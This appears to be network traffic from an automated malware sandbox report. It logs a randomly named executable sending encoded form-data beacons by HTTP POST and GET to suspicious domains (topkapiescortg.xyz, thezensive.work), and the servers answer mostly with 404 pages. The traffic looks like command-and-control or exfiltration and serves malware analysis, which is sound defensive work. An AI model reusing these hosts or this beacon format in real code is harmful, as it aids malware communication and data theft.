                                                                      Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.649736104.21.6.17806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:37.672563076 CET1822OUTPOST /vn7h/ HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.topkapiescortg.xyz
                                                                      Referer: http://www.topkapiescortg.xyz/vn7h/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 6c 6c 53 70 48 42 52 68 66 62 56 47 54 6f 77 72 77 35 57 34 77 5a 68 37 75 4e 5a 76 2b 41 79 62 72 6f 70 2b 54 4d 35 62 44 6f 77 2f 54 72 43 2b 61 33 4b 72 43 78 54 71 37 43 67 65 59 67 52 4e 73 68 51 72 57 31 68 38 61 4d 75 70 7a 7a 46 37 5a 7a 59 49 44 32 5a 54 58 70 54 33 41 50 6f 2f 52 71 76 43 4a 4d 36 2f 50 37 74 4a 55 41 53 79 4d 38 6d 42 31 34 71 41 66 32 72 33 45 48 63 53 74 47 52 35 57 6b 52 43 2b 67 6a 61 34 48 50 78 52 72 72 41 6f 4f 64 77 74 41 43 47 63 70 58 6c 4f 78 45 6b 57 35 49 74 33 6d 39 47 4f 44 68 31 47 7a 72 57 77 4f 63 5a 55 75 36 65 4c 45 68 74 4d 6e 6d 4e 43 71 52 39 4f 32 45 36 4d 46 7a 46 70 76 4a 71 54 70 58 4f 4e 44 71 69 53 5a 43 64 65 32 67 69 48 49 76 65 67 6d 63 64 45 79 55 6b 75 71 44 7a 62 72 77 79 2b 62 54 5a 64 46 4a 77 48 6b 4f 66 56 61 54 50 56 61 4f 2f 47 6b 54 57 6c 64 70 64 37 72 44 42 59 78 68 4b 63 68 33 58 4a 61 41 46 61 53 70 74 53 6f 76 58 2f 68 7a 4d 53 67 75 4f 70 62 6b 38 4d 46 61 7a 76 37 35 31 65 7a 35 4f 46 44 4e 62 56 43 4b [TRUNCATED]
                                                                      Data Ascii: 8jT4kL=llSpHBRhfbVGTowrw5W4wZh7uNZv+Aybrop+TM5bDow/TrC+a3KrCxTq7CgeYgRNshQrW1h8aMupzzF7ZzYID2ZTXpT3APo/RqvCJM6/P7tJUASyM8mB14qAf2r3EHcStGR5WkRC+gja4HPxRrrAoOdwtACGcpXlOxEkW5It3m9GODh1GzrWwOcZUu6eLEhtMnmNCqR9O2E6MFzFpvJqTpXONDqiSZCde2giHIvegmcdEyUkuqDzbrwy+bTZdFJwHkOfVaTPVaO/GkTWldpd7rDBYxhKch3XJaAFaSptSovX/hzMSguOpbk8MFazv751ez5OFDNbVCKpeKfVPClHP8mpnlDChJw+UhzDPPIIyqQK9mfaf0aJYXcJHbt33uYws9R3R2gd5mVqJArf2K8NmEstBwk0Y9rQSB8OunLVt4Fsca1yQ8GNknTwgBNxC2cmHw2wn1ebiNiPVKCkgTWGe9ZUOuBJ+MkGj3chYIaKKNStYWS8i7xj7qiJJ6qDh9T7peocJwVF0Xfnja1R86v55on3ewKYTk7dP2/TtD09yjfi5FylEx+GLPR/30bY9cmkijrnZ0s/NajSdq3k5KVmQFZ29B1aT7UueoVREoXQnt8cgsQRg1Jywz4TRhwB1tCn7AOZnawMfLOBUGZVSQvcX70nGc6tFbj00bebWdFX2wyYCLgvWKnDBRijJ9JEigaG3l+UoLq2x0EaHpvhMcvAMzDl4U4WL5jKyILlVBxtOOX8QhViNazLGg36JIh2odH/oMzcVOuQg9sZfRYo4hYaJ3c8XsUGe/sZNCIuft2n9q5lbjsuefkzZYXtbtmAvUn8EDi1MAGyivKep+sb77v1fNb6nr9DQAMdB3Cs7cger52zKzTjz5cL1w+IquLPZw+ep1RViyRd3RLL1dshuGHzxN0YL8XCfCGSOGJrU80PooCyzEnJGGMv+T18ND0lpOODd71YHEpicSDdKEPgWl/NBLUNPNmaNZBCvzxnyDMC1yzhr [TRUNCATED]
                                                                      Nov 28, 2024 10:07:39.044641972 CET1070INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:38 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFJosTQxsU%2BmrsVBTV5oOSQfHGQnvO7zdD4ntPc7OQEbEVcRWGZK4O%2BvoCMVraRsCGIPhFDiUUkMjVq7CboCG8vizCYV29w18yJgKcRtB7XRH3EwP%2BIXKPDDglt1ngA3Qc5DAowxCXJd"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e993576ea7b4231-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=8626&min_rtt=8626&rtt_var=4313&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1822&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a
                                                                      Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;
                                                                      Nov 28, 2024 10:07:39.044853926 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.649737104.21.6.17806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:40.332139969 CET520OUTGET /vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:41.779943943 CET1121INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:41 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scG9ux1sn6VSXw1I65F1ZZHsjkroTWcvII7CtSm4Fv05xceUvp6QKBGm%2BoRdmbVUcBZldxbMmDR4%2BncqWjmjbpyTCdUybRJ2qfofsMdzM1iZuZO9TjW4J1I85yDXW07D5S7nL2OtSdr%2F"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e993587cd0042c8-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.6497383.75.10.80806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:47.409003019 CET776OUTPOST /lo90/ HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.thezensive.work
                                                                      Referer: http://www.thezensive.work/lo90/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 74 56 4d 44 66 78 55 4f 69 63 53 59 55 4a 65 49 7a 77 42 68 6e 47 6a 43 76 71 71 42 73 30 6d 52 44 39 43 66 35 65 4e 51 72 34 5a 7a 6f 62 75 65 50 37 77 48 36 61 41 75 7a 5a 41 68 34 39 54 65 39 65 7a 6c 45 51 76 6c 57 74 46 33 61 30 4e 33 35 52 63 6b 6c 35 68 62 6e 6e 68 2b 39 6b 4e 6f 4c 69 31 68 4f 30 6f 6b 4f 4b 33 35 57 73 65 44 32 79 6a 4b 58 6e 4d 47 63 42 4b 67 68 41 70 4b 53 34 7a 50 58 62 69 68 4d 52 6c 66 56 35 62 42 67 6c 67 79 50 67 44 56 66 36 6c 4c 67 77 30 73 45 73 44 51 72 47 6d 44 7a 37 6d 49 71 74 6b 71 78 54 50 65 76 37 6a 4c 69 53 77 76 77 62 63 75 4d 69 34 48 77 44 50 62 36 5a 47 61
                                                                      Data Ascii: 8jT4kL=tVMDfxUOicSYUJeIzwBhnGjCvqqBs0mRD9Cf5eNQr4ZzobueP7wH6aAuzZAh49Te9ezlEQvlWtF3a0N35Rckl5hbnnh+9kNoLi1hO0okOK35WseD2yjKXnMGcBKghApKS4zPXbihMRlfV5bBglgyPgDVf6lLgw0sEsDQrGmDz7mIqtkqxTPev7jLiSwvwbcuMi4HwDPb6ZGa
                                                                      Nov 28, 2024 10:07:48.931809902 CET1236INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:48 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DK4RZ8T2Z8343P1TSEBQ
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:48.931824923 CET4INData Raw: 6e 64 3a 23
                                                                      Data Ascii: nd:#


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.6497393.75.10.80806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:50.076766968 CET800OUTPOST /lo90/ HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.thezensive.work
                                                                      Referer: http://www.thezensive.work/lo90/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 74 56 4d 44 66 78 55 4f 69 63 53 59 57 70 75 49 32 51 39 68 77 32 6a 42 32 61 71 42 31 45 6d 4b 44 39 47 66 35 61 64 36 72 71 4e 7a 72 36 65 65 4f 2b 51 48 35 61 41 75 35 35 41 75 6c 4e 53 53 39 65 2f 74 45 53 37 6c 57 74 52 33 61 32 46 33 35 68 67 6e 6c 70 68 64 35 48 68 38 69 30 4e 6f 4c 69 31 68 4f 30 74 4c 4f 4c 66 35 56 66 57 44 77 6a 6a 46 55 6e 4d 5a 4c 78 4b 67 6c 41 70 57 53 34 79 6f 58 61 2b 50 4d 58 35 66 56 35 72 42 67 33 49 78 46 67 44 58 42 4b 6b 44 78 56 42 65 44 2f 79 2f 73 33 32 34 79 61 61 69 6d 37 35 77 74 67 50 39 39 72 44 4a 69 51 6f 64 77 37 63 45 4f 69 41 48 69 55 44 38 31 74 6a 35 67 44 6d 46 6e 78 69 34 74 4b 38 4d 65 67 4a 7a 70 36 53 51 44 77 3d 3d
                                                                      Data Ascii: 8jT4kL=tVMDfxUOicSYWpuI2Q9hw2jB2aqB1EmKD9Gf5ad6rqNzr6eeO+QH5aAu55AulNSS9e/tES7lWtR3a2F35hgnlphd5Hh8i0NoLi1hO0tLOLf5VfWDwjjFUnMZLxKglApWS4yoXa+PMX5fV5rBg3IxFgDXBKkDxVBeD/y/s324yaaim75wtgP99rDJiQodw7cEOiAHiUD81tj5gDmFnxi4tK8MegJzp6SQDw==
                                                                      Nov 28, 2024 10:07:51.489156961 CET1236INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:51 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DNR2ACB1C4SHS4QGMYQY
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:51.489181042 CET1236INData Raw: 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b
                                                                      Data Ascii: nd:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last
                                                                      Nov 28, 2024 10:07:51.489198923 CET512INData Raw: 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69
                                                                      Data Ascii: 5?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JDS0DNR2ACB1C4SHS4Q


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.6497403.75.10.80806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:52.744823933 CET1813OUTPOST /lo90/ HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.thezensive.work
                                                                      Referer: http://www.thezensive.work/lo90/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 74 56 4d 44 66 78 55 4f 69 63 53 59 57 70 75 49 32 51 39 68 77 32 6a 42 32 61 71 42 31 45 6d 4b 44 39 47 66 35 61 64 36 72 71 31 7a 6f 4d 4b 65 50 66 51 48 34 61 41 75 6e 70 42 4a 6c 4e 54 49 39 66 58 70 45 53 6e 50 57 75 70 33 61 54 4a 33 37 53 34 6e 77 5a 68 64 6a 6e 68 2f 39 6b 4d 77 4c 69 6c 6c 4f 30 39 4c 4f 4c 66 35 56 5a 79 44 6d 43 6a 46 53 6e 4d 47 63 42 4b 38 68 41 70 71 53 34 62 58 58 61 37 36 4d 68 4a 66 57 64 50 42 76 69 38 78 4e 67 44 52 41 4b 6b 79 78 56 46 46 44 2f 75 4a 73 33 43 65 79 5a 47 69 6b 66 73 79 30 77 4c 41 75 71 43 6b 31 67 6b 59 77 37 4a 7a 4c 52 49 4b 6a 69 54 72 77 63 58 78 6e 32 6d 41 6d 44 2f 39 67 73 77 34 51 47 30 47 6e 34 48 66 41 2b 64 2b 71 6a 54 4d 6c 58 48 72 4c 6c 6f 32 54 63 57 63 4e 51 75 77 6d 59 6f 73 61 6c 52 64 4c 65 33 58 44 74 31 4c 58 43 36 6f 4f 57 6b 55 59 4e 57 4b 73 52 70 4c 62 31 33 36 76 6f 32 2f 4b 58 67 66 34 47 57 4a 76 45 2f 73 32 7a 5a 78 51 61 7a 78 62 57 76 37 34 4b 6b 6d 7a 32 35 55 46 31 6e 56 7a 30 4e 44 61 49 30 [TRUNCATED]
